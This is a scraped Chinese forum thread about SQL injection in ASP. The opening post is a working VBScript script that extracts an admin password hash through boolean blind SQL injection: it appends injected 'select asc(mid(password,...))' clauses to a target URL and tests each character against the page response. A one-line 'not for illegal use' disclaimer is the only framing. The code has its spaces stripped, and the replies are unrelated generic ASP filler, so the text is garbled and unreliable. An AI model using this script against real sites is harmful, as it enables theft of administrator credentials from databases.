仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 430|回复: 9
打印 上一主题 下一主题

[学习教程] ASP网页设计SQL注进研讨

[复制链接]
分手快乐 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 23:09:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
缺点:安全性不是太差了,还行,只要你充分利用系统自带的工具;唯一缺点就是执行效率慢,如何进行网站优化以后,效果会比较好。请勿用于不法用处,本代码只是为了让宽大ASP喜好者分明道理,提防于已然。

Functionbytes2BSTR(vIn)
dimstrReturn
dimi,ThisCharCode,NextCharCode
strReturn=""
Fori=1ToLenB(vIn)
ThisCharCode=AscB(MidB(vIn,i,1))
IfThisCharCode<&H80Then
strReturn=strReturn&Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))
i=i+1
EndIf
Next
bytes2BSTR=strReturn
EndFunction

functiongetHTTPPage(url)
dimhttp
sethttp=createobject("MSXML2.XMLHTTP")
Http.open"GET",url,false
Http.send()
ifHttp.readystate4then
exitfunction
endif
getHTTPPage=bytes2BSTR(Http.responseBody)
sethttp=nothing
iferr.number0thenerr.Clear
endfunction



FunctionRegExpTest(patrn,strng)
DimregEx,retVal创建变量。
SetregEx=NewRegExp创建正则表达式。
regEx.Pattern=patrn设置形式。
regEx.IgnoreCase=False设置是不是辨别巨细写。
RegExpTest=regEx.Test(strng)实行搜刮测试。
EndFunction



password=""
keyword="论坛首页"前往准确页面会呈现的字符串
url1="http://qq/bbs/list.asp?boardid=7"SQL注进出口
passlen=32MD5暗码一般是32位
dimpass
pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)暗码值一般是0-9,a-f



server.ScriptTimeout=999
fori=1topasslen
flag=false
url=url1&"and(selectasc(mid(password,"&i&",1))fromadminwhereid>0)="机关的SQL语句这里才是关头
forj=0toubound(pass)
str=getHTTPPage(url&pass(j))
flag=RegExpTest(keyword,str)
ifflag=truethen
password=password&chr(pass(j))
exitfor
endif
next
next



response.Write(password)

</p>asp,jsp,php是web开发的三大技术,asp简单易用且有microsoft做靠山,jsp功能强大是因为有java支持,php则开源跨平台.在国内,asp应用范围最广,jsp发展势头最猛,php则处于劣势.这可能与公司的支持以及技术的培训有关.
海妖 该用户已被删除
10#
发表于 2015-3-21 11:26:09 | 只看该作者
ASP(ActiveServerPages)是Microsfot公司1996年11月推出的WEB应用程序开发技术,它既不是一种程序语言,也不是一种开发工具,而是一种技术框架,不须使用微软的产品就能编写它的代码,能产生和执行动态、交互式、高效率的站占服务器的应用程序。
愤怒的大鸟 该用户已被删除
9#
发表于 2015-3-14 15:34:52 | 只看该作者
它可通过内置的组件实现更强大的功能,如使用A-DO可以轻松地访问数据库。
小妖女 该用户已被删除
8#
发表于 2015-3-7 08:31:40 | 只看该作者
Response:从字面上讲是“响应”,因此这个是服务端向客户端发送东西的,例如Response.Write
第二个灵魂 该用户已被删除
7#
发表于 2015-2-23 11:32:22 | 只看该作者
Request:从字面上讲就是“请求”,因此这个是处理客户端提交的东东的,例如Resuest.Form,Request.QueryString,或者干脆Request("变量名")
冷月葬花魂 该用户已被删除
6#
发表于 2015-2-7 21:43:13 | 只看该作者
它可通过内置的组件实现更强大的功能,如使用A-DO可以轻松地访问数据库。
小魔女 该用户已被删除
5#
发表于 2015-2-2 13:43:54 来自手机 | 只看该作者
Session:这个存储跟客户端会话过程的数据,默认20分钟失效
admin 该用户已被删除
地板
发表于 2015-1-24 23:21:45 | 只看该作者
用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。
再见西城 该用户已被删除
板凳
发表于 2015-1-24 16:59:59 | 只看该作者
Server:这个表示的服务器,操作服务器的一些东西使用这个,如Server.Mappath转换服务器路径,Server.CreateObject实例化一个组件
谁可相欹 该用户已被删除
沙发
发表于 2015-1-20 07:43:06 | 只看该作者
代码的可重用性差:由于是面向结构的编程方式,并且混合html,所以可能页面原型修改一点,整个程序都需要修改,更别提代码重用了。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-26 02:34

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表